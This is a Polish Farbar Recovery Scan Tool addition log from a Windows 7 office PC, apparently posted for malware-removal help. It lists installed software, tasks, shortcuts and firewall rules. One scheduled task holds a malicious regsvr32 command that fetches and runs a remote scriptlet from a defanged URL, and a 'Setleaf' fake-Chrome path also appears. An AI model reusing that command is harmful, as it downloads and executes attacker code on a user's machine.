Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 28-05-2017
Uruchomiony przez Lareco (30-05-2017 15:25:19)
Uruchomiony z C:\Instalki
Windows 7 Professional Service Pack 1 (X64) (2015-12-19 16:30:02)
Tryb startu: Normal
==========================================================

==================== Konta użytkowników: =============================

Administrator (S-1-5-21-3868839101-544848183-1789199905-500 - Administrator - Disabled)
Gość (S-1-5-21-3868839101-544848183-1789199905-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3868839101-544848183-1789199905-1002 - Limited - Enabled)
Lareco (S-1-5-21-3868839101-544848183-1789199905-1000 - Administrator - Enabled) => C:\Users\Lareco

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Reader XI MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.00 - Adobe Systems Incorporated)
Ashampoo Burning Studio 6 FREE v.6.84 (HKLM-x32\...\{91B33C97-3ED1-03EA-A67B-244AA4D7B559}_is1) (Version: 6.8.4 - Ashampoo GmbH & Co. KG)
BILANS Gofin 2016 1.0.6.0 (HKLM-x32\...\{fc86bc3e-e85d-40c4-8c11-a318873072e4}) (Version: 1.0.6.0 - Wydawnictwo Podatkowe GOFIN sp. z o.o.)
BILANS Gofin 2016 1.0.6.0 (x32 Version: 1.0.6.0 - Wydawnictwo Podatkowe GOFIN sp. z o.o.) Hidden
Comarch ERP Optima (HKLM-x32\...\Comarch ERP Optima) (Version: 2017.3.1.1203 - Comarch SA)
Comarch ERP Optima (x32 Version: 2017.3.1.1203 - Comarch SA) Hidden
Comarch ERP WMPAINT Fix (HKLM\...\{6713fee8-dd53-48f5-adc5-b5a0498bde48}.sdb) (Version: - )
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
CryptoCard Suite (32/64 bit) (HKLM-x32\...\{d96fbaa0-b61f-4755-8854-381526209d43}) (Version: 2.1.170 - CryptoTech)
CryptoCard Suite (64bit) (Version: 2.01.00170 - CryptoTech) Hidden
CryptoCard Suite (x32 Version: 2.01.00170 - CryptoTech) Hidden
Crystal Reports dla Comarch ERP Optima (HKLM-x32\...\Crystal Reports dla Comarch ERP Optima) (Version: 1.0.0.0 - Comarch SA)
Crystal Reports dla Comarch ERP Optima (x32 Version: 1.0.0.0 - Comarch SA) Hidden
DELEGACJE Krajowe i Zagraniczne wersja 2.80 (HKLM-x32\...\DELEGACJE Krajowe i Zagraniczne_is1) (Version: - )
DelegacjeSQL v.2.30.4 wersja bazy danych 139 (HKLM-x32\...\{7E06E20D-E637-40CA-A362-61596DB96F13}_is1) (Version: - INTER-SOFT)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.0.66 - Dell Inc.)
Dell Command | Update (HKLM-x32\...\{EC542D5D-B608-4145-A8F7-749C02BE6D94}) (Version: 2.1.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell Protected Workspace (HKLM-x32\...\{E2CAA395-66B3-4772-85E3-6134DBAB244E}) (Version: 4.0.18189 - Invincea, Inc.)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Firebird 2.1.3.18185 (Win32) (HKLM-x32\...\FBDBServer_2_1_is1) (Version: 2.1.3.18185 - Firebird Project)
Free PDF to Word Doc Converter v1.1 (HKLM-x32\...\Free PDF to Word Doc Converter_is1) (Version: 1.1 - www.hellopdf.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
iBard24 (HKLM-x32\...\{6CACB9AB-7A75-4E1B-8C71-D21F159B9B14}) (Version: 2.9.10.18637 - iComarch24 S.A.)
Intel Security True Key (HKLM\...\TrueKey) (Version: 4.3.145.1 - Intel Security)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.31.1000 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.14.4170 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.4.40 - Intel Corporation)
Manager (x32 Version: 4.0.1.25166 - 2015 pdfforge GmbH. All rights reserved) Hidden
Maxx Audio Installer (x64) (Version: 1.6.5073.107 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office 2013 dla Użytkowników Domowych i Małych Firm - pl-pl (HKLM\...\HomeBusinessRetail - pl-pl) (Version: 15.0.4927.1002 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3868839101-544848183-1789199905-1000\...\SkyDriveSetup.exe) (Version: 16.4.6012.0828 - Microsoft Corporation)
Microsoft SQL Server 2005 Backward compatibility (HKLM\...\{8909B8A7-CEAB-4772-BF29-1892C4E6603B}) (Version: 8.05.2309 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Command Line Utilities (HKLM\...\{D9F711D3-3C90-4D79-9292-47C90C722E2A}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Native Client (HKLM\...\{2180B33F-3225-423E-BBC1-7798CFD3CD1F}) (Version: 10.50.1600.1 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects (HKLM-x32\...\{DA1C1761-5F4F-4332-AB9D-29EDF3F8EA0A}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (HKLM-x32\...\{E2082604-4BA5-44BB-BBFB-AF0F3CB8C6AB}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Mozilla Thunderbird 45.8.0 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 45.8.0 (x86 pl)) (Version: 45.8.0 - Mozilla)
MSI to redistribute MS VS2005 CRT libraries (HKLM-x32\...\{A8D93648-9F7F-407D-915C-62044644C3DA}) (Version: 8.0.50727.42 - The Firebird Project)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4927.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4927.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4927.1002 - Microsoft Corporation) Hidden
PDF Architect 4 (HKLM-x32\...\PDF Architect 4) (Version: 4.0.34.26215 - pdfforge GmbH)
PDF Architect 4 Create Module (Version: 4.0.12.26604 - pdfforge GmbH) Hidden
PDF Architect 4 Edit Module (Version: 4.0.12.26604 - pdfforge GmbH) Hidden
PDF Architect 4 View Module (Version: 4.0.12.26604 - pdfforge GmbH) Hidden
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.2.2 - pdfforge)
PITy2015 IPS 1.7 kompilacja:1.7.3.9 (HKLM-x32\...\PITy2015IPS_is1) (Version: - IPS Przedsiębiorstwo Informatyczne)
Płatnik 10.01.001 (HKLM-x32\...\{05381030-963D-4779-BECA-0D7D49268EDB}) (Version: 10.01.001 - Asseco Poland S.A.)
Polski pakiet językowy dla narzędzi Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PLK) (Version: 10.0.50903 - Microsoft Corporation)
Program Pit 2016 - wersja: 10.0.4.47 (HKLM-x32\...\Roczne rozliczenie podatku dochodowego - PIT Gofin 2016_is1) (Version: - Wydawnictwo Podatkowe GOFIN sp. z o.o.)
Realtek Audio COM Components (HKLM-x32\...\{2355B503-9B11-4449-861D-1C1748B26320}) (Version: 1.0.2 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6068 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.81.00(2015-05-25) - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
SQL DMO dla Comarch ERP Optima (HKLM-x32\...\SQL DMO dla Comarch ERP Optima) (Version: 1.0.0.0 - Comarch SA)
SQL DMO dla Comarch ERP Optima (x32 Version: 1.0.0.0 - Comarch SA) Hidden
SQLXML 3.0 SP3 (HKLM-x32\...\{19ABFD8F-CB86-4965-9282-047FC27084F1}) (Version: 3.30.3457.0 - Microsoft Corporation)
Sterowniki firmy InsERT 5.19 (HKLM-x32\...\{E5CCEA56-DC84-440E-8785-D5A7A6B7FB39}) (Version: 5.19 - InsERT)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.77242 - TeamViewer)
TightVNC (HKLM\...\{D2372F87-7DA2-47F7-A102-AF2181B8EAA2}) (Version: 2.7.10.0 - GlavSoft LLC.)
WRF (Płatnik) 1.03.002 (HKLM-x32\...\{460BE803-88CF-4FD2-9082-2450A5959959}) (Version: 1.03.002 - Asseco Poland S.A.)
WRFKL 1.02.001 H (HKLM-x32\...\{A98C53C1-D7D5-43FE-82F4-EACD66292004}) (Version: 1.02.001 H - Asseco Poland S.A.)
WRFSL 1.02.001 J (HKLM-x32\...\{98A95680-71E0-4C6B-B3D0-384193FCA4F6}) (Version: 1.02.001 J - Asseco Poland S.A.)
Wtyczka e-Deklaracje (HKLM-x32\...\{81BF6353-3C5B-4E6E-A566-7E162A00BF72}_is1) (Version: 4.2.0 - Ministerstwo Finansów)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3868839101-544848183-1789199905-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\16.4.6012.0828\amd64\FileSyncApi64.dll (Microsoft Corporation)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {00E1CFD1-8495-4C86-9E16-A3CDFFBC103F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-04-11] (Microsoft Corporation)
Task: {05A9E5C5-4A87-4F01-81D4-938E639F875E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-21] (Google Inc.)
Task: {1559D02D-C400-42F7-ACF1-E13DBA6EF2D1} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {310397E1-07D2-4DCD-AE19-9C3C898C29BE} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-21] (Google Inc.)
Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll
Task: {762AF580-F691-4BB5-8543-B64BE04DAF00} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-06-25] (Adobe Systems Incorporated)
Task: {8E44A692-DCAE-4CCB-B490-7E6B769CB3C3} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2015-03-21] (Realtek Semiconductor)
Task: {C9B76950-633D-4546-9BBE-C180AFA51188} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {DFD9CC2E-61E0-46DE-86D9-B7B8203DB425} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-04-11] (Microsoft Corporation)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

Shortcut: C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Setleaf\Application\chrome.exe (Google Inc.)

==================== Załadowane moduły (filtrowane) ==============

2015-07-15 16:25 - 2015-07-15 16:25 - 00022528 _____ () C:\Windows\System32\ssa6mlm.dll
2015-12-28 10:13 - 2017-01-17 04:25 - 00117440 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-06-03 12:01 - 2015-06-03 12:01 - 00078336 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\RSyncLib.dll
2015-06-03 11:59 - 2015-06-03 11:59 - 00028672 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\iBard24.SMOWrapperV10.dll
2015-06-03 11:59 - 2015-06-03 11:59 - 00028672 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\iBard24.SMOWrapperV11.dll
2015-06-03 11:59 - 2015-06-03 11:59 - 00028672 _____ () C:\Program Files (x86)\iBard24\2.9.10.18637\iBard24.SMOWrapperV12.dll
2014-09-08 14:39 - 2014-09-08 14:39 - 00464608 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2014-09-08 14:38 - 2014-09-08 14:38 - 00051200 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2015-10-14 21:58 - 2015-04-14 04:12 - 00391784 _____ () C:\Windows\system32\igfxTray.exe
2014-11-10 12:12 - 2014-11-10 12:12 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
- - 00000000 _____ () c:\programdata\package cache\{e01cb7f1-3e88-4450-1764-b3cc1e205c4a}v10.1.14393.795\installers\30daf459e79c5d26366654b1b482e87.cab:dp
2015-10-14 13:54 - 2015-01-27 10:26 - 01905904 ____N () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-10-14 13:54 - 2012-11-25 22:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-10-14 13:54 - 2014-02-18 14:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:539 [0]
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:581 [0]
AlternateDataStreams: C:\Windows\SysWOW64\MSIHANDLE:679 [0]

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-14 04:34 - 2017-05-20 15:36 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3868839101-544848183-1789199905-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Lareco\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 10.0.0.1 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

MSCONFIG\startupreg: EEDSpeedLauncher => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher
MSCONFIG\startupreg: iBard24 => "C:\Program Files (x86)\iBard24\IBardClient.exe" -autostart

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{69A394C7-AAB5-4A29-8C22-8B8241D754D6}] => (Allow) C:\Users\Lareco\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{0B7FFF48-5B87-42F7-A4D4-B0097BB4DBA6}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [{9C5A1C2E-3952-434F-813B-D9B007B2764D}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{8FE849FA-FBB2-46DB-83D4-DF006705EECA}] => (Allow) C:\Program Files\TightVNC\tvnserver.exe
FirewallRules: [{67D38BD5-A0AE-4C7C-8479-77B173809C49}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{FBF766A8-A9F5-404F-A5AA-BF1D8794AC47}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{CAF44BD2-56BB-42EB-97D0-3F7EA07C7901}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
FirewallRules: [{9A8E3F26-5083-475E-9A23-EA558BE5E109}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDS.Application.exe
FirewallRules: [{4708007C-5511-44BE-9359-3A347029E28C}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe
FirewallRules: [{FDB0154B-C29A-41C5-96E5-CF4D8F71AEEA}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\IDSAlert.exe
FirewallRules: [{725CA7BE-3824-4A02-B72D-B65D1A9A0A5F}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe
FirewallRules: [{AB46C8FD-43CA-43BC-AF35-10F7A223E6F6}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\CDAS2PC.exe
FirewallRules: [{55EEEB16-404B-4D38-8FF7-BF08C37A6392}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\ScanProcess.exe
FirewallRules: [{1CE39466-3587-48E7-BBE0-C0DA18487C0B}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\CDAS2PC\Scan2PCNotify.exe
FirewallRules: [{3B897E5B-3370-4237-9B98-DA0C6C9CC54E}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [{2653B954-FDC8-4B8C-A993-CE7CA8FD7591}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [{0043C472-81FB-4F39-9E83-A8AA0FAA9A7D}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [{DA2CA6E2-8C71-4C58-83D9-2D0BC63C7F9D}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [TCP Query User{64C7A4E9-21CE-4907-949D-C35FFD019877}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Block) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [UDP Query User{68774D74-8651-4AAA-B750-357D3FA14B95}C:\program files (x86)\samsung\easy printer manager\ids.application.exe] => (Block) C:\program files (x86)\samsung\easy printer manager\ids.application.exe
FirewallRules: [{D7F4328C-F030-4806-BEF0-97B728139EEE}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [{3C3AA3DD-9F06-46BF-8B10-C82E0C6D4B6C}] => (Allow) C:\Program Files (x86)\Comarch ERP Optima\Analizy BI\bin\reports book\reportsbook.exe
FirewallRules: [{70FFE525-0C1E-47E9-A269-E2426BF5ABF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{4C1EB013-F3B6-437C-B4B6-7B4430252306}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{9ADA7D5F-D8FA-46F4-815C-59C87CC0A668}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{77BABD53-24C7-4D19-BE25-CF7971549C7F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{655B6149-D7C6-49E9-A319-90A134AE3F2A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe
FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

==================== Punkty Przywracania systemu =========================

23-05-2017 14:59:52 Windows Update
29-05-2017 10:19:31 Windows Update

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name: Teredo Tunneling Pseudo-Interface
Description: Karta tunelowania Teredo firmy Microsoft
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (05/30/2017 08:14:21 AM) (Source: TrueKey) (EventID: 0) (User: )
Description: Failed to process session change.
System.ArgumentException: Data Source cannot be empty. Use :memory: to open an in-memory database
   at System.Data.SQLite.SQLiteConnection.Open()
   at McAfee.YAP.Service.Data.McBioSQLite.GetConnection()
   at McAfee.YAP.Service.Data.McBioSQLite.StoreInServiceInfo(String key, String value)
   at McAfee.YAP.Service.Common.McBioBCAService.DisableSpoofingMode()
   at McAfee.YAP.Service.Service.OnSessionChange(SessionChangeDescription changeDescription)
   at System.ServiceProcess.ServiceBase.DeferredSessionChange(Int32 eventType, Int32 sessionId)

Error: (05/30/2017 08:13:49 AM) (Source: WinMgmt) (EventID: 10) (User: )
